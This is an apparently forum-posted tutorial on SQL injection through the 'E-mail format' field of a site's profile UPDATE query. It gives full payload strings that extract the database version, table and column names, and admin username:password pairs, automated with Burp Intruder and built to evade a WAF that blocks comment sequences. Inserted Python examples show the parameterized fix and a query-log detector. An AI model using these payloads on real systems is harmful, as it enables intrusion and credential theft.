SQL injection inside UPDATE query [Tutorial]
This tutorial will help you with SQLi inside an UPDATE query. The SQLi is located in the profile settings.

Picture of settings panel:

The vulnerable parameter is the "E-mail format:" value. We use Tamper Data to intercept and change the values.

Picture of intercepted values:
After we click "OK" we get this.

Picture of MySQL error:
First we want to find the database version, but what would be the easiest way? We can set values for other parameters too: MySQL will let us do that as long as the parameter is one of the columns in the UPDATE query's SET list. We will use "fname", which is a string value. The output of our query will be shown inside the "First name" input box (where it says MaXoNe).

Picture of version query:
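The mechanism described above (the injected string closes the quoted value, appends an extra `fname = (subquery)` assignment, and reopens the quote so the application's own trailing `phone = '...'` still parses) is easiest to understand by running it against a vulnerable and a hardened version of the same UPDATE. The following is an added example, not code from the original post or the target application; the table and column names (`profiles`, `fname`, `email_format`, `phone`) and the use of SQLite instead of MySQL are assumptions made for this demonstration.

```python
import sqlite3

# Constructed sample schema standing in for the profile table the settings
# panel updates (table and column names are assumptions for this example).
SCHEMA = """
CREATE TABLE profiles (
    id INTEGER PRIMARY KEY,
    fname TEXT,
    email_format TEXT,
    phone TEXT
);
INSERT INTO profiles VALUES (1, 'MaXoNe', 'text', '555-0100');
"""


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def update_vulnerable(conn, user_id, email_format, phone):
    # Vulnerable pattern: request values are pasted straight into the SQL text,
    # so a quote inside email_format changes the structure of the statement.
    sql = ("UPDATE profiles SET email_format = '%s', phone = '%s' WHERE id = %d"
           % (email_format, phone, user_id))
    conn.execute(sql)
    conn.commit()
    return sql


def update_parameterized(conn, user_id, email_format, phone):
    # Hardened pattern: placeholders keep the SET list fixed; the values are
    # bound as data and can never add an assignment or a subquery.
    conn.execute("UPDATE profiles SET email_format = ?, phone = ? WHERE id = ?",
                 (email_format, phone, user_id))
    conn.commit()


def read_profile(conn, user_id):
    row = conn.execute(
        "SELECT fname, email_format, phone FROM profiles WHERE id = ?",
        (user_id,)).fetchone()
    return {"fname": row[0], "email_format": row[1], "phone": row[2]}


def db_version():
    return sqlite3.sqlite_version


# Same shape as the post's payload: close the string, add an assignment whose
# value is a subquery, reopen the string so the original tail stays valid.
# sqlite_version() takes the place of MySQL's version() here.
PAYLOAD = "html' , fname = (select sqlite_version()) , phone = '"


def demo():
    """Apply PAYLOAD through both code paths and return the resulting rows."""
    vuln = fresh_db()
    update_vulnerable(vuln, 1, PAYLOAD, "555-0100")
    vuln_result = read_profile(vuln, 1)

    safe = fresh_db()
    update_parameterized(safe, 1, PAYLOAD, "555-0100")
    safe_result = read_profile(safe, 1)
    return vuln_result, safe_result


if __name__ == "__main__":
    vulnerable_row, hardened_row = demo()
    print("vulnerable:", vulnerable_row)  # fname now holds the version string
    print("hardened:  ", hardened_row)    # fname untouched, payload stored as text
```

In the vulnerable path the row's `fname` ends up holding the database version, exactly the effect the post reads back out of the "First name" box; in the parameterized path the whole payload is stored verbatim in `email_format` and `fname` is untouched. Note that the vulnerable statement assigns `phone` twice (once from the payload, once from the application); SQLite, like MySQL, accepts that, which is why the trailing `phone = '` trick works without a comment sequence.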
Picture of rendered content with database answer:
Now that we know how to build our query, let's get the tables.

Full query: html' , fname = (select group_concat(table_name) from information_schema.tables where table_schema = database()) , phone = '

Picture of get tables query:
Picture of rendered content with database answer:
Three tables? Strange! Let's check that again, this time with count.

Full query: html' , fname = (select count(table_name) from information_schema.tables where table_schema = database()) , phone = '

Picture of get tables count query:
Picture of rendered content with database answer:
Now it is time for Burp Intruder. Set the browser to use 127.0.0.1 port 8080 as the proxy for all URLs. We use Burp Suite Intruder with 'Attack type' "Sniper" and 'Payload type' "Numbers".

Full query: html' , fname = (select concat(table_name) from information_schema.tables where table_schema = database() limit 0,1) , phone = '

Picture of Burp settings:
That's all, and now you just get the columns the same way with Burp Suite.

Full query: html' , fname = (select concat(column_name) from information_schema.columns where table_name = 0x61646d696e73 limit n,1) , phone = '

Just increment n with Burp Suite.

Values:

Full query: html' , fname = (select concat(user,0x3a,pass) from admins limit n,1) , phone = '

Just increment n with Burp Suite.

That's it. Simple, yet effective. I used this because the WAF blocked -- and --+, so I wasn't able to close and comment out the query.

I hope you enjoyed this article and look forward to doing more. Let me know what you think in the comments :)
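Because this technique never uses a comment sequence, a WAF rule for `--` does not see it; what does stand out is the shape of the statement that reaches the database: an UPDATE whose SET list assigns a column the application never writes, assigns one column twice, or carries a subquery against information_schema. The following is an added example, not part of the original post, of checking for exactly that in MySQL general query log lines; the log lines are constructed for this demonstration, and the `EXPECTED_SET_COLUMNS` map (which columns the application's own UPDATE assigns) is an assumption that a real deployment would take from the application code.

```python
import re

# Constructed sample of MySQL general query log lines (timestamps, connection
# ids and statements are made up for this example). Lines 2 and 4 carry the
# post's injected queries; lines 1 and 3 are normal application traffic.
SAMPLE_LOG = """\
2019-05-02T10:15:01.000001Z\t   42 Query\tUPDATE profiles SET email_format = 'text', phone = '555-0100' WHERE id = 7
2019-05-02T10:15:09.000002Z\t   42 Query\tUPDATE profiles SET email_format = 'html' , fname = (select group_concat(table_name) from information_schema.tables where table_schema = database()) , phone = '', phone = '555-0100' WHERE id = 7
2019-05-02T10:15:12.000003Z\t   43 Query\tSELECT fname, email_format, phone FROM profiles WHERE id = 7
2019-05-02T10:15:20.000004Z\t   42 Query\tUPDATE profiles SET email_format = 'html' , fname = (select concat(user,0x3a,pass) from admins limit 0,1) , phone = '', phone = '555-0100' WHERE id = 7
"""

# Columns the application's own UPDATE assigns per table (assumption).
EXPECTED_SET_COLUMNS = {"profiles": {"email_format", "phone"}}

LOG_LINE = re.compile(r"^(?P<ts>\S+)\t\s*(?P<conn>\d+) Query\t(?P<sql>.*)$")
UPDATE_RE = re.compile(r"^\s*update\s+`?(?P<table>\w+)`?\s+set\s+(?P<rest>.*)$",
                       re.I | re.S)
ASSIGN_RE = re.compile(r"^`?(\w+)`?\s*=\s*(.*)$", re.S)
SUSPICIOUS = re.compile(r"\(\s*select\b|information_schema|group_concat\s*\(", re.I)


def top_level_positions(text):
    """Yield (index, char) for characters outside quotes and parentheses."""
    depth, quote = 0, None
    for i, ch in enumerate(text):
        if quote:
            if ch == quote:
                quote = None
        elif ch in ("'", '"'):
            quote = ch
        elif ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        elif depth == 0:
            yield i, ch


def split_top_level(text):
    """Split on commas that are not inside quotes or parentheses."""
    parts, start = [], 0
    for i, ch in top_level_positions(text):
        if ch == ",":
            parts.append(text[start:i].strip())
            start = i + 1
    parts.append(text[start:].strip())
    return parts


def split_set_where(rest):
    """Split the text after SET at the first top-level WHERE (not one inside a subquery)."""
    for i, ch in top_level_positions(rest):
        if (ch.lower() == "w" and rest[i:i + 5].lower() == "where"
                and (i == 0 or rest[i - 1].isspace())):
            return rest[:i].strip(), rest[i:].strip()
    return rest.strip(), None


def analyze_update(sql):
    """Return a list of reasons the UPDATE looks tampered with ([] if clean, None if not an UPDATE)."""
    m = UPDATE_RE.match(sql)
    if not m:
        return None
    table = m.group("table").lower()
    set_clause, _where = split_set_where(m.group("rest"))
    cols, reasons = [], []
    for assignment in split_top_level(set_clause):
        am = ASSIGN_RE.match(assignment)
        if not am:
            reasons.append("unparseable assignment: %s" % assignment)
            continue
        col, value = am.group(1).lower(), am.group(2)
        cols.append(col)
        if SUSPICIOUS.search(value):
            reasons.append("subquery or metadata access in value for %s" % col)
    expected = EXPECTED_SET_COLUMNS.get(table)
    if expected is not None:
        extra = sorted(set(cols) - expected)
        if extra:
            reasons.append("unexpected columns assigned: %s" % ", ".join(extra))
    dup = sorted({c for c in cols if cols.count(c) > 1})
    if dup:
        reasons.append("column assigned more than once: %s" % ", ".join(dup))
    return reasons


def scan_log(text):
    """Run analyze_update over every Query line and collect the flagged ones."""
    findings = []
    for line in text.splitlines():
        lm = LOG_LINE.match(line)
        if not lm:
            continue
        reasons = analyze_update(lm.group("sql"))
        if reasons:
            findings.append({"ts": lm.group("ts"), "conn": lm.group("conn"),
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], "conn", f["conn"], "->", "; ".join(f["reasons"]))
```

The parsing has to respect parentheses and quotes: a naive split on commas or a regex for `WHERE` would break on the `where table_schema = database()` inside the injected subquery, which is exactly the part you want to see. The duplicate `phone` assignment is the fingerprint of the reopened-quote trick and is worth alerting on even when the subquery is obfuscated enough to dodge the keyword check.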